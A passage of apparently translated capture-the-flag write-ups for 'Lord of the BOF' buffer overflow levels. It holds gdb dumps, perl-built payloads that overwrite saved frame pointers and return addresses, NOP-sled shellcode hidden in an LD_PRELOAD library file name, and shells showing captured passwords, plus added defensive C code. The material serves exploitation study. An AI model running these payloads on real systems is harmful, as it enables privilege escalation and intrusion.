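 * byte array: 40 bytes of buffer immediately followed by the 4-byte saved
 * ebp (sfp), which is the layout gdb showed. SAVED_EBP is the ebp value
 * from the dump; the array and helpers are constructed. */
#define BUF_SIZE   40
#define FRAME_SIZE (BUF_SIZE + 4)
#define SAVED_EBP  0xbffff9acU

/* Forty 'A's, the input the post passes under gdb. */
#define FORTY_A "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA"

/* Store the saved ebp little-endian, as an x86 stack would. */
static void init_frame(unsigned char *frame)
{
    int i;
    memset(frame, 0, FRAME_SIZE);
    for (i = 0; i < 4; i++)
        frame[BUF_SIZE + i] = (unsigned char)(SAVED_EBP >> (8 * i));
}

/* Read the saved ebp back; frame[BUF_SIZE] is its lowest byte. */
static uint32_t read_sfp(const unsigned char *frame)
{
    uint32_t v = 0;
    int i;
    for (i = 3; i >= 0; i--)
        v = (v << 8) | frame[BUF_SIZE + i];
    return v;
}

/* The copy exactly as problem_child does it: n = 41 into a 40-byte buffer.
 * strncpy always writes n bytes, so the 41st byte (the input's 41st
 * character, or a NUL pad if the input is shorter) overwrites the low
 * byte of the saved ebp. Returns the saved ebp after the copy. */
uint32_t sfp_after_vulnerable_copy(const char *src)
{
    unsigned char frame[FRAME_SIZE];
    init_frame(frame);
    strncpy((char *)frame, src, BUF_SIZE + 1);   /* off by one */
    return read_sfp(frame);
}

/* The corrected copy: bounded by the buffer and explicitly terminated,
 * so the saved ebp can never be touched. */
uint32_t sfp_after_fixed_copy(const char *src)
{
    unsigned char frame[FRAME_SIZE];
    init_frame(frame);
    strncpy((char *)frame, src, BUF_SIZE - 1);
    frame[BUF_SIZE - 1] = '\0';
    return read_sfp(frame);
}

int main(void)
{
    printf("vulnerable copy: saved ebp = 0x%08x\n",
           (unsigned)sfp_after_vulnerable_copy(FORTY_A));
    printf("fixed copy:      saved ebp = 0x%08x\n",
           (unsigned)sfp_after_fixed_copy(FORTY_A));
    return 0;
}
```

With the forty 'A's the post uses under gdb, the off-by-one copy leaves the saved ebp as 0xbffff900: strncpy pads the 41st byte with a NUL, and that NUL lands on the low byte of the saved ebp, which is exactly the 0xbffff900 that gdb prints at 0xbffff9ac in the dump below. The bounded copy leaves 0xbffff9ac intact whatever the input length.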


(gdb) disas problem_child
Dump of assembler code for function problem_child:
0x8048440 <problem_child>:      push   %ebp
0x8048441 <problem_child+1>:    mov    %esp,%ebp
0x8048443 <problem_child+3>:    sub    $0x28,%esp
0x8048446 <problem_child+6>:    push   $0x29
0x8048448 <problem_child+8>:    mov    0x8(%ebp),%eax
0x804844b <problem_child+11>:   push   %eax
0x804844c <problem_child+12>:   lea    0xffffffd8(%ebp),%eax
0x804844f <problem_child+15>:   push   %eax
0x8048450 <problem_child+16>:   call   0x8048374 <strncpy>
0x8048455 <problem_child+21>:   add    $0xc,%esp
0x8048458 <problem_child+24>:   lea    0xffffffd8(%ebp),%eax
0x804845b <problem_child+27>:   push   %eax
0x804845c <problem_child+28>:   push   $0x8048500
0x8048461 <problem_child+33>:   call   0x8048354 <printf>
0x8048466 <problem_child+38>:   add    $0x8,%esp
0x8048469 <problem_child+41>:   leave
0x804846a <problem_child+42>:   ret
0x804846b <problem_child+43>:   nop
End of assembler dump.
(gdb) Quit
(gdb) b *problem_child+38
Breakpoint 2 at 0x8048466
(gdb) r `perl -e 'print "A"x40'`
Starting program: /home/golem/tmp/darkknight `perl -e 'print "A"x40'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, 0x8048466 in problem_child ()
(gdb) x/100x $ebp
0xbffff9ac:     0xbffff900      0x0804849e      0xbffffb2f      0xbffff9d8
0xbffff9bc:     0x400309cb      0x00000002      0xbffffa04      0xbffffa10
0xbffff9cc:     0x40013868      0x00000002      0x08048390      0x00000000
0xbffff9dc:     0x080483b1      0x0804846c      0x00000002      0xbffffa04
0xbffff9ec:     0x080482e4      0x080484dc      0x4000ae60      0xbffff9fc
0xbffff9fc:     0x40013e90      0x00000002      0xbffffb14      0xbffffb2f
0xbffffa0c:     0x00000000      0xbffffb58      0xbffffb7a      0xbffffb84
0xbffffa1c:     0xbffffb92      0xbffffbb1      0xbffffbbf      0xbffffbd8
0xbffffa2c:     0xbffffbf3      0xbffffc12      0xbffffc1d      0xbffffc2b
0xbffffa3c:     0xbffffc6c      0xbffffc7f      0xbffffc90      0xbffffca5
0xbffffa4c:     0xbffffcae      0xbffffcbe      0xbffffcc9      0xbffffdbd
0xbffffa5c:     0xbffffdda      0xbffffde6      0xbffffdf1      0xbffffe02
0xbffffa6c:     0xbffffe16      0xbffffe1e      0x00000000      0x00000003
0xbffffa7c:     0x08048034      0x00000004      0x00000020      0x00000005
0xbffffa8c:     0x00000006      0x00000006      0x00001000      0x00000007
0xbffffa9c:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffaac:     0x08048390      0x0000000b      0x000001ff      0x0000000c
0xbffffabc:     0x000001ff      0x0000000d      0x000001ff      0x0000000e
0xbffffacc:     0x000001ff      0x00000010      0x0febfbff      0x0000000f
0xbffffadc:     0xbffffb0f      0x00000000      0x00000000      0x00000000
0xbffffaec:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffafc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb0c:     0x69000000      0x00363836      0x6d6f682f      0x6f672f65
0xbffffb1c:     0x2f6d656c      0x2f706d74      0x6b726164      0x67696e6b
0xbffffb2c:     0x41007468      0x41414141      0x41414141      0x41414141
(gdb)
0xbffffb3c:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb4c:     0x41414141      0x41414141      0x00414141      0x5353454c


We can see that the attacker-supplied data lands at around 0xbffffb~~.

Since one byte of the SFP can be manipulated, just overwrite it with an address where pointers to the attacker-supplied data are located.
The current ebp is in the 0xbffff9~~ range, so it can be moved anywhere from 0xbffff900 to 0xbffff9ff.


(gdb) x/100x $ebp-200
0xbffff8e4:     0x4001ad70      0x400143e0      0x00000003      0x40014650
0xbffff8f4:     0x00000001      0xbffff910      0x08048170      0x400140d4
0xbffff904:     0x078e530f      0xbffff98c      0xbffff944      0x4000a7fd
0xbffff914:     0x400143d0      0x400146b0      0x00000007      0x4000a74e
0xbffff924:     0x401081ec      0x4000ae60      0xbffffa04      0x400143e0
0xbffff934:     0x40021df0      0x401088c0      0x4002982c      0x40021df0
0xbffff944:     0xbffff974      0x4000a970      0xbffffb58      0xbffff9ac
0xbffff954:     0x4005d920      0x400143e0      0xbffff974      0x40066070
0xbffff964:     0x40106980      0x08048500      0xbffff984      0x401081ec
0xbffff974:     0xbffff9ac      0x08048466      0x08048500      0xbffff984
0xbffff984:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff994:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff9a4:     0x41414141      0x41414141 
     0xbffff900      0x0804849e
0xbffff9b4:     0xbffffb2f      0xbffff9d8      0x400309cb      0x00000002
0xbffff9c4:     0xbffffa04      0xbffffa10      0x40013868      0x00000002
0xbffff9d4:     0x08048390      0x00000000      0x080483b1      0x0804846c
0xbffff9e4:     0x00000002      0xbffffa04      0x080482e4      0x080484dc
0xbffff9f4:     0x4000ae60      0xbffff9fc      0x40013e90      0x00000002
0xbffffa04:     0xbffffb14      0xbffffb2f      0x00000000      0xbffffb58
0xbffffa14:     0xbffffb7a      0xbffffb84      0xbffffb92      0xbffffbb1
0xbffffa24:     0xbffffbbf      0xbffffbd8      0xbffffbf3      0xbffffc12
0xbffffa34:     0xbffffc1d      0xbffffc2b      0xbffffc6c      0xbffffc7f
0xbffffa44:     0xbffffc90      0xbffffca5      0xbffffcae      0xbffffcbe
0xbffffa54:     0xbffffcc9      0xbffffdbd      0xbffffdda      0xbffffde6
0xbffffa64:     0xbffffdf1      0xbffffe02      0xbffffe16      0xbffffe1e
(gdb)


The 0x41414141 words (highlighted in red in the original post) are the input data.
Instead of those 0x41414141 characters, put about ten copies of the address of an environment variable holding the shellcode there, then overwrite the very last byte with 84 (84 in this case).


[golem@localhost golem]$ ./darkknight `perl -e 'print "\xd1\xfd\xff\xbf"x10,"\xa4"'`
Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿¤uy¿ž-uy¿euy¿E  @
bash$ my-pass
euid = 512
new attacker
bash$


Posted by windowhan

I got a hint to use LD_PRELOAD.


LD_PRELOAD is an environment variable that specifies the path of a shared library to load.

Therefore the path carried in LD_PRELOAD is loaded first, as a shared library, and it sits in the lower part of the stack.

LD_PRELOAD can be used to hook functions of the program being run, but here it is used simply to leave a file name on the stack.
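As a defender's counterpart to this, here is an added example (mine, not the post's code) that audits an LD_PRELOAD value: each ':'- or space-separated entry must be an absolute path under a trusted library directory and must not contain a ".." component; everything else, including bare library names that get resolved through the search path, is counted as untrusted. The allow-list of prefixes and the sample values are constructed for the example. Current glibc already ignores LD_PRELOAD entries containing a slash when it runs a set-user-ID program, so the trick in this post depends on the old loader; the same check is still useful when reviewing a process environment or /etc/ld.so.preload.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not code from the post. Audits an LD_PRELOAD value:
 * an entry is trusted only if it is an absolute path under one of the
 * trusted prefixes and contains no ".." component. Entries are split
 * on ':' or ' ', the separators ld.so accepts. The prefix allow-list
 * below is constructed for the example. */
static const char *const trusted_prefixes[] = { "/lib/", "/usr/lib/", NULL };

/* Returns 1 if the entry [entry, entry+len) passes the policy, else 0. */
static int entry_is_trusted(const char *entry, size_t len)
{
    size_t i;
    int k;

    if (len == 0 || entry[0] != '/')
        return 0;                      /* empty, relative, or a bare name */

    /* reject any ".." path component, e.g. "/lib/../tmp/x.so" */
    for (i = 1; i + 1 < len; i++) {
        if (entry[i] == '.' && entry[i + 1] == '.' &&
            entry[i - 1] == '/' &&
            (i + 2 == len || entry[i + 2] == '/'))
            return 0;
    }

    for (k = 0; trusted_prefixes[k] != NULL; k++) {
        size_t plen = strlen(trusted_prefixes[k]);
        if (len > plen && strncmp(entry, trusted_prefixes[k], plen) == 0)
            return 1;
    }
    return 0;
}

/* Counts the entries of an LD_PRELOAD value that fail the policy.
 * NULL (variable unset) and "" both yield 0. */
int count_untrusted_preload(const char *value)
{
    int bad = 0;
    const char *p;

    if (value == NULL)
        return 0;
    p = value;
    while (*p != '\0') {
        const char *start;
        while (*p == ':' || *p == ' ')
            p++;                       /* skip separators */
        if (*p == '\0')
            break;
        start = p;
        while (*p != '\0' && *p != ':' && *p != ' ')
            p++;
        if (!entry_is_trusted(start, (size_t)(p - start)))
            bad++;
    }
    return bad;
}

int main(void)
{
    /* Constructed sample values; the first has the shape of the path the
     * post exports (a library under the user's own directory). */
    const char *samples[] = {
        "/home/skeleton/tmp/AAAA.so",
        "/lib/libfoo.so:/usr/lib/libbar.so",
        "/lib/../home/x/evil.so /usr/lib/ok.so",
        "libc.so.6",
    };
    size_t n;
    for (n = 0; n < sizeof samples / sizeof samples[0]; n++)
        printf("%-40s untrusted entries: %d\n", samples[n],
               count_untrusted_preload(samples[n]));
    /* and the value in this process's own environment, if any */
    printf("current LD_PRELOAD: %d untrusted\n",
           count_untrusted_preload(getenv("LD_PRELOAD")));
    return 0;
}
```

The check is deliberately strict: anything that is not an absolute path under the allow-list is flagged for review rather than silently accepted, since a bare name is resolved through the library search path at load time.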


[skeleton@localhost tmp]$ vi `perl -e 'print "A"x100,".c"'`

[skeleton@localhost tmp]$ gcc -o `perl -e 'print "A"x100,".so"'` `perl -e 'print "A"x100,".c"'` -fPIC -shared

[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "A"x100,".so"'`

0xbffff5c0:     0x00000002      0x40023fd0      0x00000000      0x00000000
0xbffff5d0:     0x40013868      0x40000814      0x400041b0      0x00000001
0xbffff5e0:     0xbffff5ec      0x40001528      0x000002c8      0x00000000
0xbffff5f0:     0x080482d0      0x00000000      0x00000001      0x40000824
0xbffff600:     0xbffff60c      0x400075bb      0x40017000      0x00002fb2
0xbffff610:     0x40013868      0xbffff7c4      0x4000380e      0x40014450
0xbffff620:     0x6d6f682f      0x6b732f65      0x74656c65      0x742f6e6f
0xbffff630:     0x412f706d      0x41414141      0x41414141      0x41414141
0xbffff640:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff650:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff660:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff670:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff680:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff690:     0x41414141      0x2e414141      0x40006f73      0x40013868
0xbffff6a0:     0x4000220c      0xbffffbc7      0x00000000      0x00000000
0xbffff6b0:     0x00000000      0x00000000      0x40014a00      0x00000000
0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000006
0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff700:     0x00000000      0x00000001      0x00000000      0x00000001
0xbffff710:     0xbffff61c      0x00060000      0x00000000      0x00000000
0xbffff720:     0x00000000      0x00000001      0x00000000      0x00000000


Even after everything is wiped like this, it survives.


[skeleton@localhost tmp]$ gcc -o `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"'` `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'` -fPIC -shared

[skeleton@localhost tmp]$ vi `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'`

[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"
> '`

[skeleton@localhost tmp]$ gdb -q ./golem
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>:       push   %ebp
0x8048471 <main+1>:     mov    %esp,%ebp
0x8048473 <main+3>:     sub    $0x2c,%esp
0x8048476 <main+6>:     cmpl   $0x1,0x8(%ebp)
0x804847a <main+10>:    jg     0x8048493 <main+35>
0x804847c <main+12>:    push   $0x8048570
0x8048481 <main+17>:    call   0x8048378 <printf>
0x8048486 <main+22>:    add    $0x4,%esp
0x8048489 <main+25>:    push   $0x0
0x804848b <main+27>:    call   0x8048388 <exit>
0x8048490 <main+32>:    add    $0x4,%esp
0x8048493 <main+35>:    mov    0xc(%ebp),%eax
0x8048496 <main+38>:    add    $0x4,%eax
0x8048499 <main+41>:    mov    (%eax),%edx
0x804849b <main+43>:    add    $0x2f,%edx
0x804849e <main+46>:    cmpb   $0xbf,(%edx)
0x80484a1 <main+49>:    je     0x80484c0 <main+80>
0x80484a3 <main+51>:    push   $0x804857c
0x80484a8 <main+56>:    call   0x8048378 <printf>
0x80484ad <main+61>:    add    $0x4,%esp
0x80484b0 <main+64>:    push   $0x0
0x80484b2 <main+66>:    call   0x8048388 <exit>
0x80484b7 <main+71>:    add    $0x4,%esp
0x80484ba <main+74>:    lea    0x0(%esi),%esi
0x80484c0 <main+80>:    mov    0xc(%ebp),%eax
0x80484c3 <main+83>:    add    $0x4,%eax
0x80484c6 <main+86>:    mov    (%eax),%edx
0x80484c8 <main+88>:    push   %edx
0x80484c9 <main+89>:    lea    0xffffffd8(%ebp),%eax
0x80484cc <main+92>:    push   %eax
0x80484cd <main+93>:    call   0x80483a8 <strcpy>
0x80484d2 <main+98>:    add    $0x8,%esp
0x80484d5 <main+101>:   lea    0xffffffd8(%ebp),%eax
0x80484d8 <main+104>:   push   %eax
0x80484d9 <main+105>:   push   $0x8048599
0x80484de <main+110>:   call   0x8048378 <printf>
0x80484e3 <main+115>:   add    $0x8,%esp
0x80484e6 <main+118>:   push   $0x2c
0x80484e8 <main+120>:   push   $0x0
0x80484ea <main+122>:   lea    0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x80484ed <main+125>:   push   %eax
0x80484ee <main+126>:   call   0x8048398 <memset>
0x80484f3 <main+131>:   add    $0xc,%esp
0x80484f6 <main+134>:   lea    0xffffffd8(%ebp),%eax
0x80484f9 <main+137>:   mov    $0xbfffffcf,%edx
0x80484fe <main+142>:   mov    %edx,%ecx
0x8048500 <main+144>:   sub    %eax,%ecx
0x8048502 <main+146>:   mov    %ecx,%eax
0x8048504 <main+148>:   push   %eax
0x8048505 <main+149>:   push   $0x0
0x8048507 <main+151>:   lea    0xffffffd8(%ebp),%eax
0x804850a <main+154>:   lea    0x30(%eax),%edx
0x804850d <main+157>:   push   %edx
0x804850e <main+158>:   call   0x8048398 <memset>
0x8048513 <main+163>:   add    $0xc,%esp
0x8048516 <main+166>:   leave
0x8048517 <main+167>:   ret
0x8048518 <main+168>:   nop
0x8048519 <main+169>:   nop
0x804851a <main+170>:   nop
0x804851b <main+171>:   nop
0x804851c <main+172>:   nop
0x804851d <main+173>:   nop
0x804851e <main+174>:   nop
0x804851f <main+175>:   nop
End of assembler dump.
(gdb)
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r `perl -e 'print Quit
(gdb) Quit
(gdb) Quit
(gdb) r `perl -e 'print "\xbf"x48'`
Starting program: /home/skeleton/tmp/./golem `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Breakpoint 1, 0x8048517 in main ()
(gdb) x/1000x 0xbfff000
0xbfff000:      Cannot access memory at address 0xbfff000
(gdb) x/1000x 0xbfffff0
0xbfffff0:      Cannot access memory at address 0xbfffff0
(gdb) x/1000x 0xbffff000
0xbffff000:     0x00000583      0x000006de      0x00000432      0x0000013f
0xbffff010:     0x0000016e      0x000002f1      0x00000000      0x00000420
0xbffff020:     0x000006c0      0x0000052e      0x0000046c      0x00000000
0xbffff030:     0x000004cd      0x00000660      0x00000000      0x000001af
0xbffff040:     0x0000048a      0x4002bb0e      0xbffff118      0x400081e6
0xbffff050:     0x4002bad5      0x4002bad5      0x40013868      0x40014930
0xbffff060:     0x0000598c      0x00000259      0x00000000      0x00000591
0xbffff070:     0x000006ea      0x000006ec      0x0000028f      0x000005bb
0xbffff080:     0x000006ce      0x00005450      0x000003c7      0x000006c2
0xbffff090:     0x00000000      0x0000070b      0x400221c0      0x00000545
0xbffff0a0:     0x40023fd0      0x4001cd70      0x40014930      0x00000004
0xbffff0b0:     0x40014ba0      0x00000002      0xbffff0d0      0x400221c0
0xbffff0c0:     0x40014b34      0x03c40f19      0xbffff14c      0x4002995c
0xbffff0d0:     0x400221c0      0x40014930      0x4002bad5      0x4002bad5
0xbffff0e0:     0x40013868      0x40014930      0x0000590a      0x0000065b
0xbffff0f0:     0x00000561      0x000005cc      0x00000000      0x40001402
0xbffff100:     0xbffff1d0      0x40008134      0x40000c7d      0x40024f23
0xbffff110:     0x40013868      0x40014930      0x00000f53      0x4000a7fd
0xbffff120:     0x40014920      0x40014c58      0x00000007      0x4000a74e
0xbffff130:     0x4010a1ec      0xbffff1d1      0x00000000      0x00000180
0xbffff140:     0x400221c0      0x4010a710      0x00000000      0x400221c0
0xbffff150:     0x40000474      0x00000000      0x40000824      0x400002f4
0xbffff160:     0x40013c00      0x00000004      0x40014ba0      0x00000004
0xbffff170:     0xbffff188      0x4001dd60      0x40014b3c      0x056e90c5
0xbffff180:     0xbffff204      0x40024f23      0x4001dd60      0x40014930
0xbffff190:     0x000000bd      0x4002bb0e      0xbffff268      0x400081e6
0xbffff1a0:     0x4002bad5      0x4002bad5      0x40013868      0x40014930
0xbffff1b0:     0x0000187f      0x00000001      0x4001fe70      0x00000310
0xbffff1c0:     0x40023fd0      0x4001cd70      0x40014930      0x00000004
0xbffff1d0:     0xbffff208      0x4000a7fd      0x40014920      0x40014c58
0xbffff1e0:     0x40001402      0xbffff2b4      0x40008134      0x40000ec9
0xbffff1f0:     0x40025713      0x40013868      0x40014930      0x00001743
0xbffff200:     0x40024f23      0x4001dd60      0xbffff248      0x4000a970
0xbffff210:     0x40017000      0x40108980      0x400c0b00      0x00000000
0xbffff220:     0x40000ec9      0x400707e4      0x00000001      0x00000000
0xbffff230:     0x00000031      0x40000664      0x00000000      0x40000824
0xbffff240:     0x400002f4      0x40013c00      0x00000004      0x40014ba0
0xbffff250:     0x00000004      0xbffff26c      0x4001e4f0      0x40014b3c
0xbffff260:     0x00dc28f5      0xbffff2e8      0x40025713      0x4001e4f0
0xbffff270:     0x40014930      0x40108980      0x40017000      0x00000031
0xbffff280:     0x4010a1ec      0x40108980      0xbffff2a8      0x4006fa3e
---Type <return> to continue, or q <return> to quit---
0xbffff290:     0x40108980      0x40017000      0x00000031      0x4010a1ec
0xbffff2a0:     0x00000001      0x40108980      0xbffff2bc      0x400711c7
0xbffff2b0:     0x40108980      0xbffff2ec      0x4000a7fd      0x40014920
0xbffff2c0:     0x40014c58      0x00000007      0x4000a74e      0x4010a1ec
0xbffff2d0:     0x0804859c      0x00000001      0x40014930      0x4001e4f0
0xbffff2e0:     0x4010a320      0x40025713      0x4001e4f0      0xbffff9a4
0xbffff2f0:     0x4000a970      0x40108980      0x00000400      0x4006c2e4
0xbffff300:     0x40014930      0xbffff9a4      0x4006428b      0x40108980
0xbffff310:     0x4010a1ec      0x4000ae60      0xbffffa44      0x00000000
0xbffff320:     0x0000675b      0x000081a4      0x00000001      0x00000000
0xbffff330:     0x00000000      0x00000808      0x00000000      0x00000000
0xbffff340:     0x00008561      0x000081ed      0x00000001      0x00000000
0xbffff350:     0x40001402      0xbffff424      0x400081e6      0x400013e1
0xbffff360:     0x400013e1      0x40013868      0x400013a5      0x40000824
0xbffff370:     0x400013d3      0x40013c00      0x40014b90      0x0000000e
0xbffff380:     0x40013e80      0x0804859c      0x250014c4      0x00000000
0xbffff390:     0x00000001      0x4002bad5      0x40001353      0x00000000
0xbffff3a0:     0xbffff428      0x40000814      0x00000052      0x40000824
0xbffff3b0:     0x400002f4      0x40013c00      0x00000004      0x40014ba0
0xbffff3c0:     0x00000003      0xbffff3dc      0x40000814      0x400140d4
0xbffff3d0:     0x0b725f23      0xbffff4b8      0x400013a5      0x40000814
0xbffff3e0:     0x40013c00      0x400002f4      0x40013c00      0x00000000
0xbffff3f0:     0x00000000      0x00000004      0x40014ba0      0x00000004
0xbffff400:     0xbffff420      0x40000674      0x400140d8      0x01ee5739
0xbffff410:     0xbffff4b8      0x40000edc      0x40013868      0x40013c00
0xbffff420:     0x00000000      0xbffff4e8      0x4000966a      0x080480f4
0xbffff430:     0x40014cf8      0x00000007      0x40013868      0x00000000
0xbffff440:     0x40013e70      0x40000814      0x40009c50      0x00005207
0xbffff450:     0x4001a0dc      0x4001a0dc      0x4001a0e8      0x00000018
0xbffff460:     0x400017f4      0x00000004      0x4001a0e8      0x40013c00
0xbffff470:     0xbffff4d0      0x2073f4cc      0xffffffff      0xffffffd0
0xbffff480:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff490:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff4a0:     0xbffff9d0      0x00000002      0x40023fd0      0x40013c00
0xbffff4b0:     0x4000ba15      0x00000000      0x00000000      0x00000001
0xbffff4c0:     0xbffff9c8      0xbffff9a3      0x0804859b      0x08048599
0xbffff4d0:     0x00000031      0xffffffff      0x00000000      0x00000001
0xbffff4e0:     0x40000824      0xbffff4f0      0x400075bb      0x40017000
0xbffff4f0:     0x00002fb2      0x40013868      0xbffff734      0x4000380e
0xbffff500:     0x400144d8      0x6d6f682f      0x6b732f65      0x74656c65
0xbffff510:     0x742f6e6f      0x902f706d      0x90909090      0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffff520:     0x90909090      0x0804859c      0x90909090      0x90909090
0xbffff530:     0x90909090      0x90909090      0x00000000      0x00000000
0xbffff540:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff550:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff560:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff570:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff580:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff590:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5d0:     0x90909090      0x90909090      0x90909090      0x68909090
0xbffff5e0:     0x81cee28a      0x530cb168      0x6f6a6854      0x0168e48a
0xbffff5f0:     0x68633069      0x69743069      0xfe59146a      0x79490c0c
0xbffff600:     0xe1f741fa      0x732ec354      0x4000006f      0x40013868
0xbffff610:     0x4000220c      0xbffffb3c      0x00000000      0x00000000
0xbffff620:     0x00000000      0x00000000      0x40014b00      0x00000000
0xbffff630:     0x00000000      0x00000000      0x00000000      0x00000006
0xbffff640:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff650:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff660:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff670:     0x00000000      0x00000001      0x00000000      0x00000001
0xbffff680:     0xbffff500      0x00060000      0x00000000      0x00000000
0xbffff690:     0x00000000      0x00000001      0x00000000      0x00000000
0xbffff6a0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6b0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff700:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff710:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff720:     0x00000000      0x00000000      0x4000f7cb      0x4000f7cb
0xbffff730:     0x40013868      0xbffff778      0x4000c84c      0x08048034
0xbffff740:     0x00000006      0xbffff774      0x40013868      0xbffff9a8
0xbffff750:     0x40013da0      0x0001fbf1      0xbffffa50      0x000001fe
0xbffff760:     0x000001fe      0x000001fe      0x000001fe      0x00000006
0xbffff770:     0x08048034      0x080483c0      0xbffff79c      0x40002179
0xbffff780:     0xbffffa40      0x4000220c      0x080483c0      0x40013868
0xbffff790:     0x00000000      0xbffff7f8      0xbffff788      0xbffffa34
0xbffff7a0:     0x400020ea      0xbffffa40      0xbffff808      0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit


[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\xbf"x44,"\x70\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿poy¿
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
bash$


Posted by windowhan

[vampire@localhost vampire]$ cat skeleton.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // argc saver
        saved_argc = argc;

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // ultra argv hunter!
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i]));
}


I got stumped while solving this...

It wipes both argv and envp, so how...

Sungwoo hyung told me that the file name sits right after envp.
It seems I can do the BOF using that.

0xbfffffde:      ""
0xbfffffdf:      ""
0xbfffffe0:      ""
0xbfffffe1:      ""
0xbfffffe2:      ""
0xbfffffe3:      ""
0xbfffffe4:      ""
0xbfffffe5:      ""
0xbfffffe6:      "/home/vampire/tmp/vul"
0xbffffffc:      ""
0xbffffffd:      ""
0xbffffffe:      ""
0xbfffffff:      ""

Using a symbolic link should work.

0xbfffffe6:      ""
0xbfffffe7:      "/home/vampire/tmp/sa"
0xbffffffc:      ""

(gdb) x/100x 0xbfffffe7
0xbfffffe7:     0x6d6f682f      0x61762f65      0x7269706d      0x6d742f65
0xbffffff7:     0x61732f70      0x00000000      Cannot access memory at address 0xbfffffff
(gdb) x/s 0xbfffffe7
0xbfffffe7:      "/home/vampire/tmp/sa"
(gdb)




0xbffffb45:0xbffffef8:

